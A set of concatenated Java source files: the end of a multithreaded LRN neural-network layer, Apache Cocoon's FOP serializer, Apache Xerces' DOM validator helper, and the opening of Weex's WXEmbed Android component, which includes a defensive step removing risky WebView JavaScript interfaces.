FileOutputStream fos = new FileOutputStream(f);
fos.write(String.valueOf(threadCount).getBytes());
fos.close();
} catch (Exception e) {
e.printStackTrace();
}
}
}
class MultiThreadLrn extends Thread {
private float[][][][] inputBlob;
private int frame, c_i, h_i, w_i, localSize;
private double alpha, beta;
private MyNum myNum;
private int cStart;
private int cEnd;
public float[][][] outputBlob;
public boolean done;
public MultiThreadLrn(float[][][][] inputBlob, int frame, int c_i, int h_i, int w_i, int localSize,
double alpha, double beta, MyNum myNum, int threadNum, int threadCount) {
this.inputBlob = inputBlob;
this.frame = frame;
this.c_i = c_i;
this.h_i = h_i;
this.w_i = w_i;
this.localSize = localSize;
this.alpha = alpha;
this.beta = beta;
this.myNum = myNum;
int channelCount = c_i / threadCount;
if (c_i % threadCount != 0)
channelCount += 1;
cStart = threadNum * channelCount;
cEnd = cStart + channelCount;
if (cStart > c_i)
cStart = c_i;
if (cEnd > c_i)
cEnd = c_i;
channelCount = cEnd - cStart;
outputBlob = new float[channelCount][h_i][w_i];
}
@Override
public void run() {
for (int c = cStart; c < cEnd ; ++c)
// For first few channels, do zero padding.
if (c < (localSize - 1) / 2)
outputBlob[c - cStart] = myNum.divide(inputBlob[frame][c], myNum.power(myNum.sum(myNum.multiply(myNum.sum(myNum.power(inputBlob, frame, 0, c + (localSize - 1) / 2 + 1, h_i, w_i, 2)), (float)alpha / localSize), 1), beta));
// For last few channels, do zero padding.
else if (c > c_i - (localSize - 1) / 2 - 1)
outputBlob[c - cStart] = myNum.divide(inputBlob[frame][c], myNum.power(myNum.sum(myNum.multiply(myNum.sum(myNum.power(inputBlob, frame, c - (localSize - 1) / 2, c_i, h_i, w_i, 2)), (float)alpha / localSize), 1), beta));
else
outputBlob[c - cStart] = myNum.divide(inputBlob[frame][c], myNum.power(myNum.sum(myNum.multiply(myNum.mean(myNum.power(inputBlob, frame, c - (localSize - 1) / 2, c + (localSize - 1) / 2 + 1, h_i, w_i, 2)), (float) alpha), 1), beta));
done = true;
}
}
|
|
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.cocoon.serialization;
import java.io.File;
import java.io.OutputStream;
import java.io.Serializable;
import java.net.MalformedURLException;
import java.util.HashMap;
import java.util.Map;
import org.apache.avalon.framework.CascadingRuntimeException;
import org.apache.avalon.framework.configuration.Configurable;
import org.apache.avalon.framework.configuration.Configuration;
import org.apache.avalon.framework.configuration.ConfigurationException;
import org.apache.avalon.framework.logger.Logger;
import org.apache.avalon.framework.service.ServiceException;
import org.apache.avalon.framework.service.ServiceManager;
import org.apache.avalon.framework.service.Serviceable;
import org.apache.excalibur.source.Source;
import org.apache.excalibur.source.SourceResolver;
import org.apache.excalibur.source.SourceValidity;
import org.apache.excalibur.source.impl.validity.NOPValidity;
import org.apache.fop.apps.Driver;
import org.apache.fop.apps.Options;
import org.apache.fop.configuration.ConfigurationParser;
import org.apache.fop.messaging.MessageHandler;
import org.apache.fop.render.Renderer;
import org.apache.cocoon.caching.CacheableProcessingComponent;
import org.apache.cocoon.components.renderer.ExtendableRendererFactory;
import org.apache.cocoon.components.renderer.RendererFactory;
import org.apache.cocoon.components.source.SourceUtil;
import org.apache.cocoon.core.container.spring.logger.LoggerUtils;
import org.apache.cocoon.util.ClassUtils;
import org.apache.cocoon.util.avalon.CLLoggerWrapper;
/**
* FOP 0.20.5 (and older) based serializer.
*
* @version $Id$
*/
public class FOPSerializer extends AbstractSerializer
implements Configurable, CacheableProcessingComponent, Serviceable {
/**
* The Renderer Factory to use
*/
protected static final RendererFactory factory = ExtendableRendererFactory.getRendererFactoryImplementation();
/**
* The <code>Driver</code> which is FOP.
*/
protected Driver driver;
/**
* The current <code>Renderer</code>.
*/
protected Renderer renderer;
/**
* The current <code>mime-type</code>.
*/
protected String mimetype;
/**
* The renderer name if configured
*/
protected String rendererName;
/**
* Should we set the content length ?
*/
protected boolean setContentLength = true;
/**
* This Avalon logger is created for FOP
*/
protected Logger logger;
/**
* It is used to make sure that default Options loaded only once.
*/
private static boolean configured;
/**
* Manager to get URLFactory from.
*/
protected ServiceManager manager;
/**
* Set the component manager for this serializer.
*/
public void service(ServiceManager manager) throws ServiceException {
this.manager = manager;
this.logger = new CLLoggerWrapper(LoggerUtils.getChildLogger(manager, "fop"));
}
/**
* Set the configurations for this serializer.
*/
public void configure(Configuration conf) throws ConfigurationException {
MessageHandler.setScreenLogger(this.logger);
// FIXME: VG: Initialize static FOP configuration with defaults, only once.
// FOP has static config, but that's going to change in the near future.
// Then this code should be reviewed.
synchronized (FOPSerializer.class) {
if (!configured) {
try {
if (getLogger().isDebugEnabled()) {
getLogger().debug("Loading default configuration");
}
new Options();
} catch (Exception e) {
getLogger().error("Cannot load default configuration. Proceeding.", e);
}
configured = true;
}
}
this.setContentLength = conf.getChild("set-content-length").getValueAsBoolean(true);
// Old syntax: Attribute src of element user-config contains file
String configUrl = conf.getChild("user-config").getAttribute("src", null);
if (configUrl != null) {
getLogger().warn("Attribute src of user-config element is deprecated. "
+ "Provide Cocoon URI as value of the element instead");
try {
// VG: Old version of serializer supported only files
configUrl = new File(configUrl).toURL().toExternalForm();
} catch (MalformedURLException e) {
getLogger().warn("Can not load config file " + configUrl, e);
configUrl = null;
}
} else {
// New syntax: Element user-config contains URL
configUrl = conf.getChild("user-config").getValue(null);
}
if (configUrl != null) {
Source configSource = null;
SourceResolver resolver = null;
try {
resolver = (SourceResolver)this.manager.lookup(SourceResolver.ROLE);
configSource = resolver.resolveURI(configUrl);
if (getLogger().isDebugEnabled()) {
getLogger().debug("Loading configuration from " + configSource.getURI());
}
SourceUtil.toSAX(configSource, new ConfigurationParser());
} catch (Exception e) {
getLogger().warn("Cannot load configuration from " + configUrl);
throw new ConfigurationException("Cannot load configuration from " + configUrl, e);
} finally {
if (resolver != null) {
resolver.release(configSource);
manager.release(resolver);
}
}
}
// Get the mime type.
this.mimetype = conf.getAttribute("mime-type");
// Iterate through the parameters, looking for a renderer reference
Configuration[] parameters = conf.getChildren("parameter");
for (int i = 0; i < parameters.length; i++) {
String name = parameters[i].getAttribute("name");
if ("renderer".equals(name)) {
this.rendererName = parameters[i].getAttribute("value");
try {
this.renderer = (Renderer)ClassUtils.newInstance(rendererName);
} catch (Exception ex) {
getLogger().error("Cannot load class " + rendererName, ex);
throw new ConfigurationException("Cannot load class " + rendererName, ex);
}
}
}
if (this.renderer == null) {
// Using the Renderer Factory, get the default renderer
// for this MIME type.
this.renderer = factory.createRenderer(mimetype);
}
// Do we have a renderer yet?
if (this.renderer == null ) {
throw new ConfigurationException(
"Could not autodetect renderer for FOPSerializer and "
+ "no renderer was specified in the sitemap configuration."
);
}
Configuration confRenderer = conf.getChild("renderer-config");
if (confRenderer != null) {
parameters = confRenderer.getChildren("parameter");
if (parameters.length > 0) {
Map rendererOptions = new HashMap();
for (int i = 0; i < parameters.length; i++) {
String name = parameters[i].getAttribute("name");
String value = parameters[i].getAttribute("value");
if (getLogger().isDebugEnabled()) {
getLogger().debug("renderer " + String.valueOf(name) + " = " + String.valueOf(value));
}
rendererOptions.put(name,value);
}
this.renderer.setOptions(rendererOptions);
}
}
}
/**
* Return the MIME type.
*/
public String getMimeType() {
return mimetype;
}
/**
* Create the FOP driver
* Set the <code>OutputStream</code> where the XML should be serialized.
*/
public void setOutputStream(OutputStream out) {
// Give the source resolver to Batik which is used by FOP
//SourceProtocolHandler.setup(this.resolver);
// load the fop driver
this.driver = new Driver();
this.driver.setLogger(this.logger);
if (this.rendererName == null) {
this.renderer = factory.createRenderer(mimetype);
} else {
try {
this.renderer = (Renderer)ClassUtils.newInstance(this.rendererName);
} catch (Exception e) {
if (getLogger().isWarnEnabled()) {
getLogger().warn("Cannot load class " + this.rendererName, e);
}
throw new CascadingRuntimeException("Cannot load class " + this.rendererName, e);
}
}
this.driver.setRenderer(this.renderer);
this.driver.setOutputStream(out);
setContentHandler(this.driver.getContentHandler());
}
/**
* Generate the unique key.
* This key must be unique inside the space of this component.
* This method must be invoked before the generateValidity() method.
*
* @return The generated key or <code>0</code> if the component
* is currently not cacheable.
*/
public Serializable getKey() {
return "1";
}
/**
* Generate the validity object.
* Before this method can be invoked the generateKey() method
* must be invoked.
*
* @return The generated validity object or <code>null</code> if the
* component is currently not cacheable.
*/
public SourceValidity getValidity() {
return NOPValidity.SHARED_INSTANCE;
}
/**
* Recycle serializer by removing references
*/
public void recycle() {
super.recycle();
this.driver = null;
this.renderer = null;
}
/**
* Test if the component wants to set the content length
*/
public boolean shouldSetContentLength() {
return this.setContentLength;
}
}
|
|
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.xerces.jaxp.validation;
import java.io.IOException;
import java.util.Enumeration;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.transform.Result;
import javax.xml.transform.Source;
import javax.xml.transform.dom.DOMResult;
import javax.xml.transform.dom.DOMSource;
import org.apache.xerces.dom.NodeImpl;
import org.apache.xerces.impl.Constants;
import org.apache.xerces.impl.XMLErrorReporter;
import org.apache.xerces.impl.validation.EntityState;
import org.apache.xerces.impl.validation.ValidationManager;
import org.apache.xerces.impl.xs.XMLSchemaValidator;
import org.apache.xerces.impl.xs.util.SimpleLocator;
import org.apache.xerces.util.NamespaceSupport;
import org.apache.xerces.util.SymbolTable;
import org.apache.xerces.util.XMLAttributesImpl;
import org.apache.xerces.util.XMLSymbols;
import org.apache.xerces.xni.NamespaceContext;
import org.apache.xerces.xni.QName;
import org.apache.xerces.xni.XMLString;
import org.apache.xerces.xni.XNIException;
import org.apache.xerces.xni.parser.XMLParseException;
import org.w3c.dom.Attr;
import org.w3c.dom.CDATASection;
import org.w3c.dom.Comment;
import org.w3c.dom.Document;
import org.w3c.dom.DocumentType;
import org.w3c.dom.Entity;
import org.w3c.dom.NamedNodeMap;
import org.w3c.dom.Node;
import org.w3c.dom.ProcessingInstruction;
import org.w3c.dom.Text;
import org.xml.sax.SAXException;
/**
* <p>A validator helper for <code>DOMSource</code>s.</p>
*
* @author Michael Glavassevich, IBM
* @version $Id$
*/
final class DOMValidatorHelper implements ValidatorHelper, EntityState {
//
// Constants
//
/** Chunk size (1024). */
private static final int CHUNK_SIZE = (1 << 10);
/** Chunk mask (CHUNK_SIZE - 1). */
private static final int CHUNK_MASK = CHUNK_SIZE - 1;
// property identifiers
/** Property identifier: error reporter. */
private static final String ERROR_REPORTER =
Constants.XERCES_PROPERTY_PREFIX + Constants.ERROR_REPORTER_PROPERTY;
/** Property identifier: namespace context. */
private static final String NAMESPACE_CONTEXT =
Constants.XERCES_PROPERTY_PREFIX + Constants.NAMESPACE_CONTEXT_PROPERTY;
/** Property identifier: XML Schema validator. */
private static final String SCHEMA_VALIDATOR =
Constants.XERCES_PROPERTY_PREFIX + Constants.SCHEMA_VALIDATOR_PROPERTY;
/** Property identifier: symbol table. */
private static final String SYMBOL_TABLE =
Constants.XERCES_PROPERTY_PREFIX + Constants.SYMBOL_TABLE_PROPERTY;
/** Property identifier: validation manager. */
private static final String VALIDATION_MANAGER =
Constants.XERCES_PROPERTY_PREFIX + Constants.VALIDATION_MANAGER_PROPERTY;
/** Property identifier: xml schema version. */
private static final String XML_SCHEMA_VERSION =
Constants.XERCES_PROPERTY_PREFIX + Constants.XML_SCHEMA_VERSION_PROPERTY;
//
// Data
//
/** Error reporter. */
private final XMLErrorReporter fErrorReporter;
/** The namespace context of this document: stores namespaces in scope. **/
private final NamespaceSupport fNamespaceContext;
/** The namespace context of the DOMSource, includes context from ancestor nodes. **/
private final DOMNamespaceContext fDOMNamespaceContext = new DOMNamespaceContext();
/** Schema validator. **/
private final XMLSchemaValidator fSchemaValidator;
/** Symbol table **/
private final SymbolTable fSymbolTable;
/** Validation manager. **/
private final ValidationManager fValidationManager;
/** Component manager. **/
private final XMLSchemaValidatorComponentManager fComponentManager;
/** Simple Locator. **/
private final SimpleLocator fXMLLocator = new SimpleLocator(null, null, -1, -1, -1);
/** DOM document handler. **/
private DOMDocumentHandler fDOMValidatorHandler;
/** DOM result augmentor. **/
private final DOMResultAugmentor fDOMResultAugmentor = new DOMResultAugmentor(this);
/** DOM result builder. **/
private final DOMResultBuilder fDOMResultBuilder = new DOMResultBuilder();
/** Map for tracking unparsed entities. **/
private NamedNodeMap fEntities = null;
/** Array for holding character data. **/
private final char [] fCharBuffer = new char[CHUNK_SIZE];
/** Root node. **/
private Node fRoot;
/** Current element. **/
private Node fCurrentElement;
/** Fields for start element, end element, characters, comments and processing instructions. **/
final QName fElementQName = new QName();
final QName fAttributeQName = new QName();
final XMLAttributesImpl fAttributes = new XMLAttributesImpl();
final XMLString fTempString = new XMLString();
/** Flag indicating whether the schema version is 1.1. */
private final boolean fIsXSD11;
public DOMValidatorHelper(XMLSchemaValidatorComponentManager componentManager) {
fComponentManager = componentManager;
fErrorReporter = (XMLErrorReporter) fComponentManager.getProperty(ERROR_REPORTER);
fNamespaceContext = (NamespaceSupport) fComponentManager.getProperty(NAMESPACE_CONTEXT);
fSchemaValidator = (XMLSchemaValidator) fComponentManager.getProperty(SCHEMA_VALIDATOR);
fSymbolTable = (SymbolTable) fComponentManager.getProperty(SYMBOL_TABLE);
fValidationManager = (ValidationManager) fComponentManager.getProperty(VALIDATION_MANAGER);
fIsXSD11 = Constants.W3C_XML_SCHEMA11_NS_URI.equals(fComponentManager.getProperty(XML_SCHEMA_VERSION));
}
/*
* ValidatorHelper methods
*/
public void validate(Source source, Result result)
throws SAXException, IOException {
if (result instanceof DOMResult || result == null) {
final DOMSource domSource = (DOMSource) source;
final DOMResult domResult = (DOMResult) result;
Node node = domSource.getNode();
fRoot = node;
if (node != null) {
fComponentManager.reset();
fValidationManager.setEntityState(this);
fDOMNamespaceContext.reset();
String systemId = domSource.getSystemId();
fXMLLocator.setLiteralSystemId(systemId);
fXMLLocator.setExpandedSystemId(systemId);
fErrorReporter.setDocumentLocator(fXMLLocator);
try {
// regardless of what type of node this is, fire start and end document events
setupEntityMap((node.getNodeType() == Node.DOCUMENT_NODE) ? (Document) node : node.getOwnerDocument());
setupDOMResultHandler(domSource, domResult);
fSchemaValidator.startDocument(fXMLLocator, null, fDOMNamespaceContext, null);
validate(node);
fSchemaValidator.endDocument(null);
}
catch (XMLParseException e) {
throw Util.toSAXParseException(e);
}
catch (XNIException e) {
throw Util.toSAXException(e);
}
finally {
// Release references to application objects
fRoot = null;
fCurrentElement = null;
fEntities = null;
if (fDOMValidatorHandler != null) {
fDOMValidatorHandler.setDOMResult(null);
}
}
}
return;
}
throw new IllegalArgumentException(JAXPValidationMessageFormatter.formatMessage(fComponentManager.getLocale(),
"SourceResultMismatch",
new Object [] {source.getClass().getName(), result.getClass().getName()}));
}
/*
* EntityState methods
*/
public boolean isEntityDeclared(String name) {
return false;
}
public boolean isEntityUnparsed(String name) {
if (fEntities != null) {
Entity entity = (Entity) fEntities.getNamedItem(name);
if (entity != null) {
return (entity.getNotationName() != null);
}
}
return false;
}
/*
* Other methods
*/
/** Traverse the DOM and fire events to the schema validator. */
private void validate(Node node) {
final Node top = node;
final boolean useIsSameNode = useIsSameNode(top);
// Performs a non-recursive traversal of the DOM. This
// will avoid a stack overflow for DOMs with high depth.
while (node != null) {
beginNode(node);
Node next = node.getFirstChild();
while (next == null) {
finishNode(node);
if (top == node) {
break;
}
next = node.getNextSibling();
if (next == null) {
node = node.getParentNode();
if (node == null || ((useIsSameNode) ?
top.isSameNode(node) : top == node)) {
if (node != null) {
finishNode(node);
}
next = null;
break;
}
}
}
node = next;
}
}
/** Do processing for the start of a node. */
private void beginNode(Node node) {
switch (node.getNodeType()) {
case Node.ELEMENT_NODE:
fCurrentElement = node;
// push namespace context
fNamespaceContext.pushContext();
// start element
fillQName(fElementQName, node);
processAttributes(node.getAttributes());
fSchemaValidator.startElement(fElementQName, fAttributes, null);
break;
case Node.TEXT_NODE:
if (fDOMValidatorHandler != null) {
fDOMValidatorHandler.setIgnoringCharacters(true);
sendCharactersToValidator(node.getNodeValue());
fDOMValidatorHandler.setIgnoringCharacters(false);
fDOMValidatorHandler.characters((Text) node);
}
else {
sendCharactersToValidator(node.getNodeValue());
}
break;
case Node.CDATA_SECTION_NODE:
if (fDOMValidatorHandler != null) {
fDOMValidatorHandler.setIgnoringCharacters(true);
fSchemaValidator.startCDATA(null);
sendCharactersToValidator(node.getNodeValue());
fSchemaValidator.endCDATA(null);
fDOMValidatorHandler.setIgnoringCharacters(false);
fDOMValidatorHandler.cdata((CDATASection) node);
}
else {
fSchemaValidator.startCDATA(null);
sendCharactersToValidator(node.getNodeValue());
fSchemaValidator.endCDATA(null);
}
break;
case Node.PROCESSING_INSTRUCTION_NODE:
// The XSD 1.0 validator does nothing with processing instructions so bypass it unless it's 1.1.
if (fIsXSD11) {
fillXMLString(fTempString, node.getNodeValue());
fSchemaValidator.processingInstruction(node.getNodeName(), fTempString, null);
}
// Send the ProcessingInstruction node directly to the result builder.
if (fDOMValidatorHandler != null) {
fDOMValidatorHandler.processingInstruction((ProcessingInstruction) node);
}
break;
case Node.COMMENT_NODE:
// The XSD 1.0 validator does nothing with comments so bypass it unless it's 1.1.
if (fIsXSD11) {
fillXMLString(fTempString, node.getNodeValue());
fSchemaValidator.comment(fTempString, null);
}
// Send the Comment node directly to the result builder.
if (fDOMValidatorHandler != null) {
fDOMValidatorHandler.comment((Comment) node);
}
break;
case Node.DOCUMENT_TYPE_NODE:
/**
* Send the DocumentType node directly to the result builder.
*/
if (fDOMValidatorHandler != null) {
fDOMValidatorHandler.doctypeDecl((DocumentType) node);
}
break;
default: // Ignore other node types.
break;
}
}
/** Do processing for the end of a node. */
private void finishNode(Node node) {
if (node.getNodeType() == Node.ELEMENT_NODE) {
fCurrentElement = node;
// end element
fillQName(fElementQName, node);
fSchemaValidator.endElement(fElementQName, null);
// pop namespace context
fNamespaceContext.popContext();
}
}
/**
* Extracts NamedNodeMap of entities. We need this to validate
* elements and attributes of type xs:ENTITY, xs:ENTITIES or
* types dervied from them.
*/
private void setupEntityMap(Document doc) {
if (doc != null) {
DocumentType docType = doc.getDoctype();
if (docType != null) {
fEntities = docType.getEntities();
return;
}
}
fEntities = null;
}
/**
* Sets up handler for <code>DOMResult</code>.
*/
private void setupDOMResultHandler(DOMSource source, DOMResult result) throws SAXException {
// If there's no DOMResult, unset the validator handler
if (result == null) {
fDOMValidatorHandler = null;
fSchemaValidator.setDocumentHandler(null);
return;
}
final Node nodeResult = result.getNode();
// If the source node and result node are the same use the DOMResultAugmentor.
// Otherwise use the DOMResultBuilder.
if (source.getNode() == nodeResult) {
fDOMValidatorHandler = fDOMResultAugmentor;
fDOMResultAugmentor.setDOMResult(result);
fSchemaValidator.setDocumentHandler(fDOMResultAugmentor);
return;
}
if (result.getNode() == null) {
try {
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setNamespaceAware(true);
DocumentBuilder builder = factory.newDocumentBuilder();
result.setNode(builder.newDocument());
}
catch (ParserConfigurationException e) {
throw new SAXException(e);
}
}
fDOMValidatorHandler = fDOMResultBuilder;
fDOMResultBuilder.setDOMResult(result);
fSchemaValidator.setDocumentHandler(fDOMResultBuilder);
}
private void fillQName(QName toFill, Node node) {
final String prefix = node.getPrefix();
final String localName = node.getLocalName();
final String rawName = node.getNodeName();
final String namespace = node.getNamespaceURI();
toFill.prefix = (prefix != null) ? fSymbolTable.addSymbol(prefix) : XMLSymbols.EMPTY_STRING;
toFill.localpart = (localName != null) ? fSymbolTable.addSymbol(localName) : XMLSymbols.EMPTY_STRING;
toFill.rawname = (rawName != null) ? fSymbolTable.addSymbol(rawName) : XMLSymbols.EMPTY_STRING;
toFill.uri = (namespace != null && namespace.length() > 0) ? fSymbolTable.addSymbol(namespace) : null;
}
private void processAttributes(NamedNodeMap attrMap) {
final int attrCount = attrMap.getLength();
fAttributes.removeAllAttributes();
for (int i = 0; i < attrCount; ++i) {
Attr attr = (Attr) attrMap.item(i);
String value = attr.getValue();
if (value == null) {
value = XMLSymbols.EMPTY_STRING;
}
fillQName(fAttributeQName, attr);
// REVISIT: Assuming all attributes are of type CDATA. The actual type may not matter. -- mrglavas
fAttributes.addAttributeNS(fAttributeQName, XMLSymbols.fCDATASymbol, value);
fAttributes.setSpecified(i, attr.getSpecified());
// REVISIT: Should we be looking at non-namespace attributes
// for additional mappings? Should we detect illegal namespace
// declarations and exclude them from the context? -- mrglavas
if (fAttributeQName.uri == NamespaceContext.XMLNS_URI) {
// process namespace attribute
if (fAttributeQName.prefix == XMLSymbols.PREFIX_XMLNS) {
fNamespaceContext.declarePrefix(fAttributeQName.localpart, value.length() != 0 ? fSymbolTable.addSymbol(value) : null);
}
else {
fNamespaceContext.declarePrefix(XMLSymbols.EMPTY_STRING, value.length() != 0 ? fSymbolTable.addSymbol(value) : null);
}
}
}
}
private void sendCharactersToValidator(String str) {
if (str != null) {
final int length = str.length();
final int remainder = length & CHUNK_MASK;
if (remainder > 0) {
str.getChars(0, remainder, fCharBuffer, 0);
fTempString.setValues(fCharBuffer, 0, remainder);
fSchemaValidator.characters(fTempString, null);
}
int i = remainder;
while (i < length) {
str.getChars(i, i += CHUNK_SIZE, fCharBuffer, 0);
fTempString.setValues(fCharBuffer, 0, CHUNK_SIZE);
fSchemaValidator.characters(fTempString, null);
}
}
}
private void fillXMLString(XMLString toFill, String str) {
final int length = str.length();
final char[] strArray;
if (length <= fCharBuffer.length) {
str.getChars(0, length, fCharBuffer, 0);
strArray = fCharBuffer;
}
else {
strArray = str.toCharArray();
}
toFill.setValues(strArray, 0, length);
}
/**
* Use isSameNode() for testing node identity if the DOM implementation
* supports DOM Level 3 core and it isn't the Xerces implementation.
*/
private boolean useIsSameNode(Node node) {
if (node instanceof NodeImpl) {
return false;
}
Document doc = node.getNodeType() == Node.DOCUMENT_NODE
? (Document) node : node.getOwnerDocument();
return (doc != null && doc.getImplementation().hasFeature("Core", "3.0"));
}
/**
* Returns the current element node.
*/
Node getCurrentElement() {
return fCurrentElement;
}
/**
* NamespaceContext for the DOMSource, includes context for ancestor nodes.
*/
final class DOMNamespaceContext implements NamespaceContext {
//
// Data
//
/**
* Namespace binding information. This array is composed of a
* series of tuples containing the namespace binding information:
* <prefix, uri>.
*/
protected String[] fNamespace = new String[16 * 2];
/** The size of the namespace information array. */
protected int fNamespaceSize = 0;
/**
* Flag indicating whether the namespace context
* has been from the root node's ancestors.
*/
protected boolean fDOMContextBuilt = false;
//
// Methods
//
public void pushContext() {
fNamespaceContext.pushContext();
}
public void popContext() {
fNamespaceContext.popContext();
}
public boolean declarePrefix(String prefix, String uri) {
return fNamespaceContext.declarePrefix(prefix, uri);
}
public String getURI(String prefix) {
String uri = fNamespaceContext.getURI(prefix);
if (uri == null) {
if (!fDOMContextBuilt) {
fillNamespaceContext();
fDOMContextBuilt = true;
}
if (fNamespaceSize > 0 &&
!fNamespaceContext.containsPrefix(prefix)) {
uri = getURI0(prefix);
}
}
return uri;
}
public String getPrefix(String uri) {
return fNamespaceContext.getPrefix(uri);
}
public int getDeclaredPrefixCount() {
return fNamespaceContext.getDeclaredPrefixCount();
}
public String getDeclaredPrefixAt(int index) {
return fNamespaceContext.getDeclaredPrefixAt(index);
}
public Enumeration getAllPrefixes() {
return fNamespaceContext.getAllPrefixes();
}
public void reset() {
fDOMContextBuilt = false;
fNamespaceSize = 0;
}
private void fillNamespaceContext() {
if (fRoot != null) {
Node currentNode = fRoot.getParentNode();
while (currentNode != null) {
if (Node.ELEMENT_NODE == currentNode.getNodeType()) {
NamedNodeMap attributes = currentNode.getAttributes();
final int attrCount = attributes.getLength();
for (int i = 0; i < attrCount; ++i) {
Attr attr = (Attr) attributes.item(i);
String value = attr.getValue();
if (value == null) {
value = XMLSymbols.EMPTY_STRING;
}
fillQName(fAttributeQName, attr);
// REVISIT: Should we be looking at non-namespace attributes
// for additional mappings? Should we detect illegal namespace
// declarations and exclude them from the context? -- mrglavas
if (fAttributeQName.uri == NamespaceContext.XMLNS_URI) {
// process namespace attribute
if (fAttributeQName.prefix == XMLSymbols.PREFIX_XMLNS) {
declarePrefix0(fAttributeQName.localpart, value.length() != 0 ? fSymbolTable.addSymbol(value) : null);
}
else {
declarePrefix0(XMLSymbols.EMPTY_STRING, value.length() != 0 ? fSymbolTable.addSymbol(value) : null);
}
}
}
}
currentNode = currentNode.getParentNode();
}
}
}
private void declarePrefix0(String prefix, String uri) {
// resize array, if needed
if (fNamespaceSize == fNamespace.length) {
String[] namespacearray = new String[fNamespaceSize * 2];
System.arraycopy(fNamespace, 0, namespacearray, 0, fNamespaceSize);
fNamespace = namespacearray;
}
// bind prefix to uri in current context
fNamespace[fNamespaceSize++] = prefix;
fNamespace[fNamespaceSize++] = uri;
}
private String getURI0(String prefix) {
// find prefix in the DOM context
for (int i = 0; i < fNamespaceSize; i += 2) {
if (fNamespace[i] == prefix) {
return fNamespace[i + 1];
}
}
// prefix not found
return null;
}
}
} // DOMValidatorHelper
|
|
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package com.taobao.weex.ui.component;
import android.annotation.SuppressLint;
import android.text.TextUtils;
import android.view.Gravity;
import android.view.View;
import android.view.ViewGroup;
import android.webkit.WebView;
import android.widget.FrameLayout;
import android.widget.ImageView;
import com.taobao.weappplus_sdk.R;
import com.taobao.weex.IWXRenderListener;
import com.taobao.weex.WXRenderErrorCode;
import com.taobao.weex.WXSDKInstance;
import com.taobao.weex.annotation.Component;
import com.taobao.weex.common.Constants;
import com.taobao.weex.common.WXPerformance;
import com.taobao.weex.common.WXRenderStrategy;
import com.taobao.weex.dom.WXDomObject;
import com.taobao.weex.utils.WXLogUtils;
import com.taobao.weex.utils.WXUtils;
import com.taobao.weex.utils.WXViewUtils;
@Component(lazyload = false)
public class WXEmbed extends WXDiv implements WXSDKInstance.OnInstanceVisibleListener,NestedContainer {
public static final String ITEM_ID = "itemId";
private String src;
private WXSDKInstance mNestedInstance;
private static int ERROR_IMG_WIDTH = (int) WXViewUtils.getRealPxByWidth(270,750);
private static int ERROR_IMG_HEIGHT = (int) WXViewUtils.getRealPxByWidth(260,750);
private boolean mIsVisible = true;
private EmbedRenderListener mListener;
public interface EmbedManager {
WXEmbed getEmbed(String itemId);
void putEmbed(String itemId,WXEmbed comp);
}
public static class FailToH5Listener extends ClickToReloadListener {
@SuppressLint("SetJavaScriptEnabled")
@Override
public void onException(NestedContainer comp, String errCode, String msg) {
//downgrade embed
if( errCode != null && comp instanceof WXEmbed && errCode.startsWith("1|")) {
ViewGroup container = comp.getViewContainer();
WebView webView = new WebView(container.getContext());
ViewGroup.LayoutParams params = new ViewGroup.LayoutParams(ViewGroup.LayoutParams.MATCH_PARENT, ViewGroup.LayoutParams.MATCH_PARENT);
webView.setLayoutParams(params);
webView.getSettings().setJavaScriptEnabled(true);
//WebView Remote Code Execution Vulnerability
webView.removeJavascriptInterface("searchBoxJavaBridge_");
webView.removeJavascriptInterface("accessibility");
webView.removeJavascriptInterface("accessibilityTraversal");
webView.getSettings().setSavePassword(false);
container.removeAllViews();
container.addView(webView);
webView.loadUrl(((WXEmbed) comp).src);
}else{
super.onException(comp,errCode,msg);
}
}
}
/**
* Default event listener.
*/
public static class ClickToReloadListener implements OnNestedInstanceEventListener {
@Override
public void onException(NestedContainer container, String errCode, String msg) {
if (TextUtils.equals(errCode, WXRenderErrorCode.WX_NETWORK_ERROR) && container instanceof WXEmbed) {
final WXEmbed comp = ((WXEmbed)container);
final ImageView imageView = new ImageView(comp.getContext());
imageView.setImageResource(R.drawable.error);
FrameLayout.LayoutParams layoutParams = new FrameLayout.LayoutParams(ERROR_IMG_WIDTH, ERROR_IMG_HEIGHT);
layoutParams.gravity = Gravity.CENTER;
imageView.setLayoutParams(layoutParams);
imageView.setScaleType(ImageView.ScaleType.FIT_XY);
imageView.setAdjustViewBounds(true);
imageView.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
imageView.setOnClickListener(null);
imageView.setEnabled(false);
comp.loadContent();
}
});
FrameLayout hostView = comp.getHostView();
hostView.removeAllViews();
hostView.addView(imageView);
WXLogUtils.e("WXEmbed", "NetWork failure :" + errCode + ",\n error message :" + msg);
}
}
@Override
public boolean onPreCreate(NestedContainer comp, String src) {
